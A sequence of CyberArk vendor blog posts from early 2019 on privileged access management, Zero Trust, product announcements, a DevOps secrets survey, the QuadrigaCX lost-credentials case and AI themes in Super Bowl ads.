Next, the adoption of SaaS applications took hold as businesses looked to scale their applications across multiple end user PCs, without filling up too much of the (at the time) expensive hardware and storage space.

Naturally, then we find our data and workloads moving to the cloud. Our files, documents and emails are on Office365 and our usage of public data sources (and within SaaS) increases. Lastly, infrastructure extends to hybrid architectures via Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform, which is how many organizations are architected today (Figure 2).

Figure 2. The perimeter transitions into a more a fluid and dynamic state, with users, applications, data and Tier 0 assets moving within and outside of the traditional model.

Throughout this evolutionary process, the perimeter had become so fluid and dynamic in nature that the boundaries, in the traditional sense, ultimately disappeared. The perimeter is no longer a static entity; it’s been made permeable by the disruption of things like cloud, digital transformation, the Internet of Things (IoT), mobile access and an increasingly geo-distributed workforce.

Within these modernized architectures and with an expanded attack surface, the privileged access pathway creates significantly more risk (Figure 3). Let’s differentiate the two access pathways: the standard user ultimately has very basic, low-level access limited to just the application layer; the privileged user, essentially, has unfettered access to the application layer, sensitive data and the mission critical Tier 0 assets. This inherently carries a much higher-level of risk if left unmanaged and unsecured, given the decentralized nature of this model.

Zero Trust is not just limited to human users, but to non-human users as well, e.g. applications interacting with operating systems via service accounts and business (and robotic) automation processes where software bots are connecting, storing and accessing sensitive data and applications. As the security layers slip through the fingers of the organization, securing important data becomes a much bigger challenge.

Figure 3. An example of the standard and privileged access pathways in a modernized architecture.

Let’s highlight a standardized workflow for the privileged user. Let’s assume a privileged user is working abroad while on a business trip and he or she is trying to configure and run a cloud service hosted in an AWS instance, which requires pulling a database running on a Unix box racked in an existing mainframe. Ensuring that there’s a consistent point of trust throughout this workflow is a challenge that needs to be addressed; the user remotely connects to different islands of systems, databases and applications (both on-premises and in the cloud) creating many potential points of entry for an attacker.

This evolutionary process of the security model not only aligns to the basis by which the principles of Zero Trust were established, it reaffirms the importance of securing privileged access. The foundation of Zero Trust is, arguably, the same as the foundation for why CyberArk and the privileged management space exists. Now, while most enterprises may not be willing to fully abandon firewalls and perimeter security, they, certainly, should be placing their focus on tightening security from the inside to mitigate risk of an advanced attack.

In the next installment, we discuss the evolution of trust and make recommendations for building out modern architectures that align to Zero Trust frameworks.

To learn more, watch the Implementing Privileged Access Security into Zero Trust Models and Architectures webinar.

Continue reading in part 2.

]]>
RSA Conference 2019 — That’s a Wrap! https://www.cyberark.com/blog/rsa-conference-thats-a-wrap/ Fri, 08 Mar 2019 15:30:04 +0000 https://www.cyberark.com/?p=37942

We’re home from the RSA Conference 2019. We came together with peers, partners and customers from around the world to tackle the greatest cybersecurity challenges of today. The 28th annual event’s theme was simply, better.

This means working hard to find better solutions. Making better connections with peers from around the world. Keeping the digital world safe so everyone can get on with making the real world a better place. Because security truly is a team game.

At the conference, CyberArk’s industry contributions were recognized at the SC Awards Gala, where the CyberArk Privileged Access Security Solution was named the SC Awards 2019 winner for Best Enterprise Security Solution. Widely considered the gold standard of excellence in cybersecurity, the SC Award recognizes CyberArk’s market leadership, its role in strengthening the IT security industry’s continued evolution and its dedication to helping organizations reduce cyber risk and accelerate their digital transformation journeys with confidence. We are honored to be recognized by the SC Awards for our commitment to innovation and product excellence.

At RSA Conference 2019, CyberArk was also named the Cyber Defense InfoSec Awards Market Leader for Privileged Account Management. According to Cyber Defense Magazine, which gives out the awards, Cyber Defense InfoSec Awards go to “hottest, most innovative, best, market leaders, next-generation and cutting edge INFOSEC companies.” CyberArk is proud to be counted among their number.

While at the conference, CyberArk announced the launch of The CyberArk Privileged Access Security Solution v10.8, the industry’s first privileged access security solution for continuous discovery and protection in the cloud, featuring ground-breaking new capabilities that mitigate the risk of privileged AWS account exploitation and deliver just-in-time flexible user access across hybrid environments. CRN spotlighted it as one of the hottest products announcements at the show.

CyberArk Labs Researcher Nimrod Stoler of CyberArk Labs – CyberArk’s white hat research team – presented original, in-depth research, by CyberArk Labs – “Highlighting Security Blind Spots in the DevOps Butler.” into vulnerabilities in the Jenkins automation server, which found security issues such as credential exposure, agent launch vulnerabilities, AD integration issues and more – demonstrating that the DevOps environment may not be as secure as you think. Stoler offered his audience a solution: the zero-trust model.

In conjunction with Stoler’s speech, CyberArk Labs published new research during RSA showing how cyber-attackers can manipulate container defense-in-depth strategies to gain access to an organization’s most valuable assets. This report is part of CyberArk Labs’ industry-leading research examining how cyber-attackers can utilize existing vulnerabilities to circumvent container security and take advantage of DevOps environments. ThreatPost kicked off its RSA Conference 2019 coverage with an in-depth article on the new findings. For additional, related research read How I Hacked Play-with-Docker and Remotely Ran Code on the Host and Securing Kubernetes Clusters by Eliminating Risky Permissions.

As we think back on our time at RSA Conference 2019, it’s clear to us after numerous conversations, demos and meetings over the past two days on the show floor that organizations are committed to prioritizing and protecting privilege access – to making their cybersecurity better. Whether you’re just getting started with a privileged access management program or are focused on implementing advanced strategies to align with transformative, new technologies, we are here to help.

]]>
Announcing CyberArk Application Access Manager — Secrets Management for Applications, Tools, Containers and DevOps https://www.cyberark.com/blog/announcing-cyberark-application-access-manager-secrets-management-for-applications-tools-containers-and-devops/ Mon, 04 Mar 2019 14:00:34 +0000 https://www.cyberark.com/?p=37451

We’re excited to announce the availability of CyberArk Application Access Manager, which combines CyberArk Application Identity Manager and Conjur Enterprise into a unified, powerful offering providing secrets management for applications, third party tools, containers and DevOps environments.

Application Access Manager helps organizations control, manage and audit non-human privileged access for a wide range of applications across on-premises, hybrid and cloud environments. Protecting credentials for application and other non-human identities is critical for organizations. Non-human credentials are ubiquitous. Unfortunately, hard-coded credentials are too often embedded in many different types of applications, including commercial off-the-shelf-solutions, internally-developed business critical applications and within the CI/CD tool chain.

These credentials need to be managed because they enable access to protected data and other applications, leverage cloud resources and services and have the ability to scale and execute business processes instantly. This is great when you control the credentials, but can rapidly become a massive problem when an attacker has them. Fortunately, the same security principles that work to protect human credentials should apply to non-human credentials, though – due to higher performance and scale requirements and the special technologies required to strongly authenticate applications or code and other factors – protecting non-human credentials requires its own solution. Least privilege, role-based access controls, credential rotation, management and audit can all be applied to non-human credentials.

Part of the CyberArk Privileged Access Security Solution, Application Access Manager provides privileged access and credential and secrets management for a wide variety of application types, including:

  • Commercial off-the-shelf solutions: Provides and manages credentials for third-party tools and solutions including security and IT operation tools, RPA (Robot Process Automation) and other automation, as well as configuration management and orchestration tools.
  • Internally-developed traditional applications: Protects business-system data and simplifies operations by eliminating hard-coded credentials from applications and scripts developed internally by the organization.
  • Cloud-native applications built using DevOps methodologies: Meets the dynamic needs of DevOps and cloud-native environments to manage secrets and credentials used by non-human entities – including CI/CD toolchains, containerized applications and PaaS environments.

Application Access Manager includes all the functionality that was previously available in Application Identity Manager and the enterprise version of Conjur. This powerful functionality helps organizations:

  • Control and manage privileged access for non-humans identities: Secure applications and other non-human identities across on-premises, hybrid, containerized and multi-cloud environments.
  • Establish strong authentication: Leverages the native attributes of applications, containers and other non-human identities to eliminate “secret zero bootstrapping.”
  • Simplify integrations: Supports integrations with a variety of commercial software platforms, applications and tools – including business applications, security tools, RPA platforms, CI/CD toolsets and container platforms.
  • Accelerate deployment and usage: Allows developers to focus their attention on developing software by making securing application secrets simple and easy. Additionally, the open source version on conjur.org makes it easy for developers to start securing their CI/CD pipeline and applications in development.

The solution meets other critical enterprise requirements, including ensuring a comprehensive tamper-resistant audit and consistently applied access policies, as well as meeting scalability and availability requirements. For additional details refer to the new Application Access Manager Data Sheet.

The new Application Access Manager is designed to make the purchasing and deployment process easier for customers. It makes licensing simpler by making it easier for customers to select the licensing option that is best for them. For example, it enables customers on their digital transformation journey to flexibly allocate licenses between on-premises environments and dynamic containerized deployments in the cloud.

This flexibility is already proving popular with customers as they make their digital journey, confident that they can count on CyberArk to help them consistently manage credentials for human users, applications and other non-human identifies – to help reduce the attack surfaces and stay safe.

Interested in learning more? Visit the new Application Access Manager Product page and DevOps Solution page on cyberark.com, download the new Application Access Manager datasheet. Conjur Open Source will continue to offer a feature-rich solution for developers and is available at conjur.org.

Stop by and see us at RSA Conference booth #6253 North!

]]>
Government Organizations: Address Cloud Security and Compliance with the CyberArk Privileged Access Security Solution for AWS GovCloud (US) https://www.cyberark.com/blog/government-organizations-address-cloud-security-and-compliance-with-the-cyberark-privileged-access-security-solution-for-aws-govcloud-us/ Thu, 28 Feb 2019 14:45:25 +0000 https://www.cyberark.com/?p=37238

When government agencies, organizations in government-regulated industries or private entities want to take advantage of the cloud, they turn to AWS GovCloud (US), an isolated region within the AWS cloud that hosts sensitive data, regulated workloads and addresses relevant security and federal compliance requirements.

AWS GovCloud brings the agility and scalability benefits of the AWS cloud platform to US-based customers with the most stringent regulatory and compliance requirements. And now, based on customer demand, the CyberArk Privileged Access Security Solution supports and runs on AWS GovCloud.

The CyberArk solution enables organizations running on AWS GovCloud to dramatically simplify and automate privileged access protection for sensitive cloud-based systems and applications while strengthening compliance and accelerating digital transformation initiatives. The solution also enables organizations to consistently enforce privileged access management policies across cloud, on-premises and hybrid environments.

With CyberArk, AWS GovCloud (US) customers can:

Discover and onboard

  • Automate and continually discover privileged accounts and credentials, including cloud console access, AWS IAM and EC2 account passwords as well as accounts and credentials, SSH Keys, and API keys across on-premises, cloud or hybrid environments
  • Reduce risk from cyber-attacks and meet compliance requirements
  • Accelerate onboarding of unmanaged accounts based on risk

Monitor

  • Suspend or terminate privileged sessions automatically based on risk score and activity across environments, including AWS instances
  • Minimize end user impact with granular level controls
  • Integrate with SOC tools and prioritize alerts based on risk score

Record

  • Reduce time spent on audit review with the ability to start viewing logs at the point risky activity began
  • Risk-based review and response through risk level classification

The CyberArk Privileged Access Security Solution is  strongly positioned to help organizations meet today’s challenging security and compliance requirements. The solution is on the US Department of Defense (DoD) Unified Capabilities Approved Products List (UC APL). Like AWS GovCloud, the CyberArk solution is compliant with Federal Information Security Management Act (FISMA) and Healthcare Insurance Portability & Accountability Act (HIPAA) privacy standards.

The CyberArk solution for AWS GovCloud is available now to qualified, US-based customers through a SaaS subscription model. To learn more, visit the AWS Marketplace.

To learn more about CyberArk’s comprehensive cloud security offerings, visit https://www.cyberark.com/cloud.

]]>
7 Ways CyberArk Simplifies Deployment, Integration and Scaling of Privileged Access Management https://www.cyberark.com/blog/7-ways-cyberark-simplifies-deployment-integration-and-scaling-of-cybersecurity-controls/ Tue, 26 Feb 2019 14:30:53 +0000 https://www.cyberark.com/?p=36959

CyberArk aims to make implementing and managing a robust privileged access program as easy as possible for our customers. CyberArk continues to lead the industry with its own investments in innovation to consistently deliver the most value to customers – especially in terms of simplicity, automation and improved operational efficiencies. Over the course of the last calendar year alone, CyberArk introduced dozens of new capabilities  to help customers more easily implement and scale their privileged access management controls. Here’s a list of our top seven updates to the Core CyberArk Privileged Access Security solution:

  1. Privileged Session Management for the Cloud – In March of last year, CyberArk acquired cloud security provider Vaultive and rolled the functionality into the CyberArk Privileged Access Security Solution. This provides organizations with greater visibility and control over privileged business users, social media, SaaS, IaaS and PaaS administrators, and enables customers to manage privileged sessions natively. This introduces yet another method for CyberArk customers to isolate and monitor sessions for web-based applications. These sessions are automatically assigned a risk-score, much like any other privileged session in CyberArk, which helps SOC admins take a risk-based approach to securing their most critical assets. Accounts that revolve around cloud providers (AWS, Azure, Google Cloud Platform) social media (Twitter, Facebook, LinkedIn) and other web applications like Salesforce and OpenShift can now be secured while providing a native login experience to the admins and privileged business users of this critical applications.
  1. Integrated threat detection and response — Threat detection, alerts, and responses generated by the CyberArk Privileged Access Security Solution are now 100% integrated into the main console and also sent as logs directly to your SIEM tool or other alerting system. CyberArk administrators now have access to in-depth analytics on who or what is utilizing privileged access in the environment and to see this information without having to look up from where they set policies, review sessions or log in to do their other administrative tasks. Not only that, but they are also able to receive prioritized alerts and initiate automated action to take a risk-based approach to privileged access management; tackling the riskiest accounts, credentials and activities first, thus reducing clutter and excessive alerts.
  2. Automatic Risky Session Termination –CyberArk provides security teams with the tools they need to automatically suspend or terminate risky privileged sessions based on policy from the web based interface or via API. The new tools enables security operations teams to mitigate risk by automatically shutting down or suspending sessions that pose a security risk until verified, rather than waiting for a human to identify the problem and act.
  3. PowerShell Utility for Un-Suspending Users — When a suspended user needs to be granted re-entry to CyberArk, instead of losing time relying on manual intervention to let the user back in, a member of our Customer Success Team, Randy Brown, came up with clever way to use a PowerShell utility to revive suspended accounts. We’ve made this time-saver available free on GitHub, and this is one of many useful tools made available to our customers on GitHub.
  4. Automatic Account On-Boarding — Combing through all the privileged accounts that are discovered and onboarding them en masse into the vault can be time consuming. It can also presents a security risk when end users create backdoor access to perform their own tasks. With CyberArk’s recent introduction of automatic account onboarding, neither of these things are an issue anymore. Automatic account onboarding helps administrators scale their privileged controls with reduced human intervention and increased speed to manage privileged accounts that present risk to your organization.
  5. Privileged Access Security Installer – When CyberArk released version 10.4, it included the Privileged Access Security Installer, which delivers a massive reduction in the steps required to deploy all of the CyberArk Core Privileged Access Security components. This is part of a concerted effort to support smaller deployments that deploy all CyberArk components on a single server.
  6. CyberArk Marketplace – Since the launch of the CyberArk Marketplace in 2018, CyberArk has deepened the depth and breadth of ready-to-deploy integrations – especially in key areas like IT Management and security software, Industrial Control Systems, Robotic Process Automation and Identity Access Management. Customers who use the CyberArk Marketplace can easily find and deploy integrations from CyberArk’s 100+ certified technical partners to bolster their security posture.

What’s Next?

Right now, cybersecurity professionals are having to do more with less. Having solutions, tools and features in place to help security teams effectively and efficiently use the products in their purview is more essential than ever. We recently hosted a webinar that outlines, and demonstrates new capabilities introduced in version 10 that help customers deploy, integrate and scale with CyberArk. Click here to access the recording and learn more!

]]>
Who’s Afraid of Security Headlines? Stay Safe with Proven Privileged Access Management https://www.cyberark.com/blog/whos-afraid-of-security-headlines-stay-safe-with-proven-privileged-access-security/ Thu, 21 Feb 2019 14:30:35 +0000 https://www.cyberark.com/?p=36136

Daily morning headlines from Dark Reading, Krebs on Security, ThreatPost and others remind us that breaches are inevitable – they are not a matter of “if,” but instead, “when.” This is increasingly understood, so one wonders if this reality leads people to make overly rash decisions based on what they read with their morning cuppa joe?

Catch that last question? Let’s talk about recency bias – the tendency to place too much weight on recent events.

While many IT practitioners, especially those in security, believe that we are perfectly astute and calculated bastions of logical decision-making, we are all, indeed, human. And agencies and news publications alike have capitalized on fear mongering, knowing that we cannot avoid consuming and commenting on the latest event driving headlines. Now, while there is little danger in your Kardashian obsession (Mine lately has been Jho Low, the embattled billionaire accused of swindling billions from the Malaysian government), there is potential danger in basing security purchases and strategies purely on the latest security fad.

New tools and technologies constantly enter the security market. Some vendors, often founded by security practitioners, are deploying powerful systems absolutely bursting with functionality, intelligence and potential. Moreover, while the wildly innovative and nascent tools are interesting, security leaders have to provide the most security value they can – increasingly in terms of quantifiable risk reduction — across their entire organization.

What I suggest is, instead of chasing headlines, to adopt technologies that have gained recognition from security thought leaders and influencers for their ability to reduce risk and increase a company’s security posture. One place to look for direction is the Center for Internet Security (CIS), which provides a list of top security controls. This includes what they call “controlled use of administrative privileges” and we call privilege access management. Privileged access exists everywhere in your organization and has existed as long as administrator and superuser accounts have been integral to the operation of applications and infrastructure. Although it seems obvious that protecting privileged access is critical to maintaining security, it was, at a time, viewed as a niche security tool or something organizations could do as an “extra” step to securing the enterprise… a “nice to have,” if you will.

If you look into key regulations, across myriad industries, you will find that protecting privileged access is one of the key tenants to adhere to when the auditors come knocking. PCI-DSS 3.2, Sarbanes Oxley, HIPAA and NERC CIP all require the protection and monitoring of privileged users and sessions.  That being said, embarking on a privileged access management program isn’t just about checking the box to fulfill a compliance requirement but a key step in staying one step ahead of the attackers.

Many of us work in high tech because there is constant innovation and cutting edge solutions that push the limits of computing.

Technophiles should not fear as there are privileged access management companies like CyberArk experimenting with bleeding-edge tools, developing brand new technologies and implementing techniques to stay ahead of the attackers. For those interested in innovative techniques and deep privileged access management research, check out the CyberArk Threat Research Blog – and remember, news publications are fighting to be the most sensational and generate the most clicks. Trust your instincts and deploy proven privileged access controls instead.

]]>
New DevOps eBook: Managing Application Secrets – What Do Developers Really Want? https://www.cyberark.com/blog/new-ebook-managing-application-secrets-what-do-developers-really-want/ Tue, 19 Feb 2019 14:30:39 +0000 https://www.cyberark.com/?p=36668

There’s no doubt that DevOps methodologies offer significant strategic and competitive advantages. But, these benefits are not without risk. With faster code delivery at scale, the attack surface can grow rapidly with exponentially more secrets to manage and secure.

Importantly, while security teams set policies, it is the developers who are on the front lines coding, testing and building the applications – and actually securing the secrets. To find out more about how developers go about managing secrets in the applications they are developing for large enterprises, we commissioned an independent survey of DevOps managers and developers.

The survey’s findings are presented in our latest eBook, “Managing Application Secrets – What Do Developers Really Want?” The following provides a brief overview of some key takeaways. For a deeper look into how developers approach secrets management and the challenges enterprises face in securing secrets, their future plans and potential roadblocks, download the eBook here.

 Built-in secrets management isn’t enough. Consider this: An organization utilizes Docker, Puppet, AWS, Kubernetes, Ansible and Azure. All of these DevOps tools and platforms offer some built-in secrets management capabilities, but the tools are not compatible with each other. Each tool takes a different approach to security and uses a different API, making the developer’s job more difficult. As requirements change and new tools are introduced, developers will likely need to address the challenges of integrating tools and managing and sharing secrets across these disparate systems.

 Ownership confusion abounds. While developers can play a key role in selecting secrets management platforms, the platforms are often purchased by various teams and at multiple organizational levels with no single group “owning” decision-making and budgeting. This haphazard approach means different teams turn to different tools and services, creating layers of unnecessary complexity and questions about who is responsible for what, while laying the groundwork for future security issues. CyberArk discovered that less than half (41 percent) of security and DevOps teams are integrated throughout the whole application development process.

 Standardization is key – but organizations face roadblocks. The vast majority — nearly 80 percent – of respondents indicate that it was important or very important to standardize on secrets management tools. Further, 60 percent consider it important or very important to have a privileged access or identity management vendor that also provides secrets management for their DevOps and CI/CD pipeline. This indicates that respondents recognize the importance of consistently securing credentials for both human users as well as applications and other non-human users. (This is important as it is human users who typically, initially assign privileged access to non-human users.) However, it’s not happening widely as only 24 percent of respondents said that they are currently using a standardized tool.

So while it’s clear that secrets management tools should be coordinated and integrated with enterprise-wide, privileged access management solutions – why have so few standardized? Our research points to budget constraints, still-evolving secrets management solutions, security teams that don’t adequately understand DevOps and fragmented decision processes as the biggest roadblocks to standardization today. The eBook looks at how these roadblocks can be addressed.

The new eBook provides the developer’s perspective on securing DevOps environments. (At end of the day, what developers really want is the freedom to keep innovating and delivering high-value products—without slowing down). The eBook complements the recently published CISO View report that provides the security leader’s perspective on securing DevOps environments. The eBook highlights four actionable and immediate steps DevOps and security teams can take to start making applications more secure. Both The CISO View and the Managing Application Secrets eBook are based on research conducted by independent research firms and are product agnostic.

To learn more about CyberArk’s solutions for securing DevOps environments visit cyberark.com/devops, CyberArk offers the industry’s only platform-independent secrets management solution specifically architected to protect containerized and cloud-native applications across the CI/CD pipeline. A feature rich open source solution, Conjur Open Source, provides easy access to developers and is available for download at conjur.org, as well as GitHub, AWS Marketplace and GCP.

On Tuesday, February 26th, CyberArk will present the webinar “How CISOs at Leading Global Organizations Secure their DevOps Environments.” The webinar will cover The recently-released CISO View report and provide practical guidance on DevOps security based on insights from CISOs at Global 1000 companies and other experts. Click here to register for the webinar.

]]>
Champions of Health and Cybersecurity Unite at HIMSS 2019 https://www.cyberark.com/blog/champions-of-health-and-cybersecurity-unite-at-himss-2019/ Tue, 12 Feb 2019 20:12:29 +0000 https://www.cyberark.com/?p=36623

Today is the first full day of HIMSS 2019 – the world’s largest health information and technology conference – and we’ve just arrived in sunny Orlando, Florida, joining more than 45,000 healthcare professionals from across 90+ countries. This year, HIMSS is emphasizing cyber security and privacy – and we’re here to help.

Healthcare providers on the frontlines are rapidly turning to new models of care to offer advanced patient services and improve clinical outcomes. This year’s conference will explore a range of topics and technologies driving this evolution such as clinical informatics, digital health, interoperability, technology consumerization and personalized healthcare. Yet, as healthcare delivery networks expand in size and sophistication, they are also generating huge amounts of sensitive patient data or electronic personal health information (ePHI) – a key target for cyber attackers.

According to the 2018 End-of-Year Data Breach Report from the Identity Theft Resource Center, the healthcare sector had the second largest number of breaches last year, exposing nearly 10 million patient records (double the number from 2017). Additionally, the report found that healthcare databases had the highest rate of exposure per breach. Furthermore, according to Larry Ponemon, founder of the Ponemon Institute, a single stolen medical record is estimated to be worth

Protect Your Modern Healthcare Investments with CyberArk

Today’s healthcare providers require strong privileged access management to secure access to ePHI within expanding, interoperable care delivery networks, while protecting against persistent threats such as ransomware.

At HIMSS, we’ll demonstrate how the industry-leading CyberArk Privileged Access Security Solution supports your ability to protect ePHI, enable your IT team, simplify compliance and protect your investments – while easily accommodating innovation and expansion to safeguard your position as a leading provider of quality care. We invite you to connect with us at the show by:

  • Visiting CyberArk at the HIMSS Cybersecurity Command Center Booth #400 Kiosk #88. Engage in interactive, hands-on demos and discussions to enhance your knowledge on today’s hottest cyber security issues. Come see why seven of the top 10 hospital systems in the U.S. rely on CyberArk to mitigate the risks of privileged access and help them adopt transformative technologies with confidence.
  • Attending our presentation, “On the Front Lines of Managing Privileged Access.” Join us on February 12 at 4:45 p.m. in Cybersecurity Command Center Theater 2 to explore common attack methods for accessing coveted healthcare data and how strong privileged access management (or the lack thereof) can make or break a healthcare organization’s ability to demonstrate regulatory compliance and avoid financial penalties. We’ll also outline a proven, risk-prioritized approach for establishing essential privileged access controls to help quickly strengthen your security posture.

Interested in learning more? Check out these free resources to help jump-start your privileged access management program.

 

 

 

 

]]>
Congratulations to CyberArk’s Scott Whitehouse on Being Named a CRN Channel Chief Four Years Running!    https://www.cyberark.com/blog/congratulations-to-cyberarks-scott-whitehouse-on-being-named-a-crn-channel-chief-four-years-running/ Mon, 11 Feb 2019 17:10:39 +0000 https://www.cyberark.com/?p=36581

As enterprises increasingly adopt new technologies – from cloud and DevOps to IoT and robotic process automation – their security and compliance challenges multiply. That’s why we’ve built a powerful, vibrant community of partners who share our belief that security is a team game and our commitment to helping customers around the world protect privileged access, address advanced cyber threats and accelerate digital transformation strategies. 

Leading the charge on our go-to-market strategies for innovative, integrated solutions; deep, vibrant partner ecosystem; and wealth of available partner resources is Scott Whitehouse, vice president of channels and alliances. 

Today, we’re thrilled to announce that Scott has been named a CRN Channel Chief for the fourth consecutive year! He’s recognized among the best of the best leaders who build, support and deliver superior partner programs and strategy. 

Scott continues to build strong channel relationships and deliver differentiated, award-winning solutions to the channel. Here are just a few of his recent accomplishments:  

  • Spearheaded the launch of our expanded multi-tenant, pay-as-you-go MSSP offering, which provides partners with greater flexibility and the ability to easily add privileged access management capabilities to their portfolios so they can expand market opportunities and create new revenue streams. 
  • Led the expansion of CyberArk’s partner ecosystem and grew strategic partnerships with a variety of firms, including PwC, Optiv, Deloitte and KPMG. 
  • Established new channel opportunities for cloud and DevOps through increased channel awareness of CyberArk capabilities enabling partners to protect against advanced security threats across dynamic environments.

Scott also played an instrumental role in launching the CyberArk Marketplace, and creating exciting opportunities through new and expanded integrations with C3 Alliance technology partners such as AWS, Red Hat, SAP, SailPoint, Okta and more. 

Please join us in congratulating Scott – a true leader who knows how to create and drive a partner program that delivers! 

To learn more about the CyberArk global partner ecosystem, visit us here. 

]]>
Premiering Feb. 19: CyberArk Webinar on Top Security Projects Featuring Gartner’s Neil MacDonald https://www.cyberark.com/blog/premiering-feb-19-cyberark-webinar-on-top-security-projects-featuring-gartners-neil-macdonald/ Wed, 06 Feb 2019 14:30:11 +0000 https://www.cyberark.com/?p=36311

When it comes to picking the right security projects, Neil MacDonald, Gartner vice president and distinguished analyst, knows exactly where to start — “Focus on projects that reduce the most amount of risk and have the largest business impact,” he said.1

Gartner’s information security team did just that when they assembled their top ten recommendations for security projects. The team went through dozens of submissions for top security project and stack ranked them as a team before they selected privileged access management as their top project.

On Tuesday, February 19, CyberArk will present the webinar “Top Security Projects for Security and Risk Management Organizations.” It features Gartner’s Neil MacDonald and, Steven Preston, CyberArk’s vice president of corporate marketing. The webinar will examine Gartner’s top five security recommendations and how they made their choices.

The Gartner information security team began with a set of criteria for how to select their top projects. They had to be real projects – not programs. Every implementation on the list needed to have a start and end date. They also needed to be real technology. While the Gartner team wanted to advance newer technology, they also insisted that everything on the list be able to be budgeted and staffed within a year.

The number one priority for the top security projects was that they reduce risk. However, reducing risk wasn’t necessarily enough. CISOs often have a large number of projects to divide their budget or difficulty getting the staffing they need, so the projects needed to not just reduce risk, but reduce the most risk for the amount of resources they required.

Business impact made up the other half of the evaluation criteria. These projects also had to be the best in terms of their ability to help CISOs meet business their business objectives – whether those were enabling DevSecOps style development or keeping attackers out.

In the end, the security and risk team chose Privileged Access Management for the top spot because it was able to significantly reduce risk by making it harder for attackers to compromise privileged credentials.

Register here for the webinar premiere on Feb. 19.

Watch the webinar to find out how Gartner’s top five security recommendations can help you improve your business. Take a deep dive into the privileged access management space with the 2018 Gartner Magic Quadrant for Privileged Access Management2 report.

 

1Smarter with Gartner. “Top 10 Security Projects for 2018.” Jill Beadle. 6 June 2018.

2 Gartner, “Magic Quadrant for Privileged Access Management,” Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018.

]]>
Lost Access to Cryptocurrency Cold Storage Puts $200 Million on Ice https://www.cyberark.com/blog/lost-access-to-cryptocurrency-cold-storage-puts-200-million-on-ice/ Tue, 05 Feb 2019 18:59:32 +0000 https://www.cyberark.com/?p=36320

After the death of its founder, Canadian crypto exchange QuadrigaCX has not been able to access close to $200 million worth of cryptocurrency. Gerald Cotton, QuadrigaCX’s founder, was the only person who knew, or had any access to the passwords for the account that held the majority of the firm’s cryptocurrency assets. He opted to hold these company assets in “cold storage,” which is a way of storing Bitcoin or other cryptocurrency offline, as opposed to a “hot wallet” that are run on internet connected devices, and are therefore susceptible to cyberattack. Cryptocurrency cold storage is more common for holding large amounts of cryptocurrency, whereas hot wallets are used for more day-to-day type transactions and store smaller amounts of crypto, so there’s nothing out of the ordinary in QuadrigaCX’s using cryptocurrency cold storage. The real problem occurs when the only person who can gain access to the money isn’t around anymore.

However, only having one person that’s able to access these credentials presents its own inherent level of risk. Both Cotton’s widow and technical experts have so far been unable to bypass the encryption that safeguards QuadrigaCX’s money and QuadrigaCX’s clients are looking to recoup their investments. Reports have the firm trying to employ sophisticated decryption methods, digging through old notebooks, spreadsheets and everything in between to get into Cotton’s cryptocurrency cold storage.

It’s, frankly, a testament to Cotton that no one has been able to access his company’s most important assets even after his death. However, his decision to keep his privileges to himself has left his company – and his wife – in dire straits. Nobody associated with the firm has been able to recoup a password, as it appears they were not written down, stored in a spreadsheet, or passed along to anyone else. Of course, to avoid security breaches involving privilege, privileged credentials should never be left out in the open, on Post-it notes, on thrown away notebooks, or kept on spreadsheets (gasp). But, as we’ve seen with QuadrigaCX, keeping everything to yourself has its own dangers. Management is key.

Unfortunately, we’ve seen attacker use all of the above to get into various organization’s networks, so it’s worth repeating that privileged credentials should be guarded and kept secret from anyone who doesn’t require that level of access in order to do their job. But, when only one person knows the credentials, there is no method for disaster recovery or shared access in the event that the “knower of passwords” isn’t able to provide them. The risks associated with keeping credentials and assets offline, especially when only one person is able to access them are severe and demonstrate the importance of having a centralized, encrypted repository that can safeguard privileged credentials, passwords, keys, secrets, and more.

]]>
Super Bowl Ads Tackle AI and Cybersecurity https://www.cyberark.com/blog/super-bowl-ads-tackle-ai-and-cyber-security/ Mon, 04 Feb 2019 17:33:35 +0000 https://www.cyberark.com/?p=36198

Super Bowl LIII just concluded and the Patriots are now tied for the most Super Bowl victories in NFL history alongside the Pittsburgh Steelers.   And Tom Brady is now the oldest quarterback to ever win the Super Bowl and no quarterback has even played in more Super Bowls than Brady has won! But, enough carrying on about the Patriot’s epic win and let’s discuss what the main event is for many Super Bowl viewers, the advertisements!

From my point of view, the best ads from Super Bowl LIII were the “not brewed with corn syrup” ads from Budweiser Light.  The ads kept the popular “Dilly! Dilly!” concept going while cleverly weaving in Bud Light’s new “not brewed with corn syrup” theme.  And the Bud Light take-over ad by HBO’s Game of Thrones was completely unexpected and quite clever.

However, even when watching the Super Bowl, I don’t stop thinking about cybersecurity. So, I noticed just how many of this year’s Super Bowl ads related to the power and potential downside of artificial intelligence. The most positive depiction of AI came with the ad for the Mercedes A class. The protagonist in the ad uses AI-backed voice recognition software to makes his wishes come, including swapping out the singer at an opera for Ludacris and freeing a whale — Free Willy- style.  Although the Mercedes A class cannot go that far in real life, the voice recognition and AI can free up the driver’s hands by making cabin temperature adjustments, changing the media that’s playing or altering the cabin lighting.

In contrast, other ads hinted at some of the potential risks that AI could bring. A good example here is the SimpliSafe home security ad where an anxious middle aged man worries  that robots are going to take his job and that his smart speakers are “always listening.”  But, the ad that best exposes the risks of AI is the ad from Alexa showing some of the Alexa functionality that didn’t make the cut, including a dog collar that let Harrison Ford’s pug order insane quantities of dog food and sausage, while Harrison Ford looks on helpless.

Although done in a humorous, tongue in a cheek fashion, the ad does point to the very real down side of poorly designed and poorly secured always-connected AI-powered technology. Although an Alexa dog collar that allows Fido to order a ton of dog food might seem funny, a manufacturing organization that has its industrial robots hacked could face very serious consequences.

A recent article in the Wall St. Journal titled “For Industrial Robots, Hacking Risks are on the Rise” points out that risk of cyberattacks against industrial robots is increasing as more of these robots are being connected to the Internet and as the adoption of 5G encourages more connected automation. An attacker could potentially leverage unsecured privileged access to take control of a manufacturing robot and alter its movements so that it creates defective products. Or attackers could plant malware in the robots, forcing companies to pay a ransom before they can return to normal operations.

Risks are not strictly limited to the domain of manufacturing robots. Software bots are becoming increasingly popular as enterprises adopt Robotic Process Automation (RPA). RPA automates and standardizes repeatable business processes with the use of software robots. These software robots interact with applications in the same way that a person does. While RPA delivers tremendous business benefits to organizations in terms of increased operational efficiency, it can come with some risks if not properly secured. For example, an attacker could compromise a highly privileged robot user account to gain access to sensitive data and move laterally within a network or a malicious insider could train a bot to destroy high-value data or interrupt key business processes.

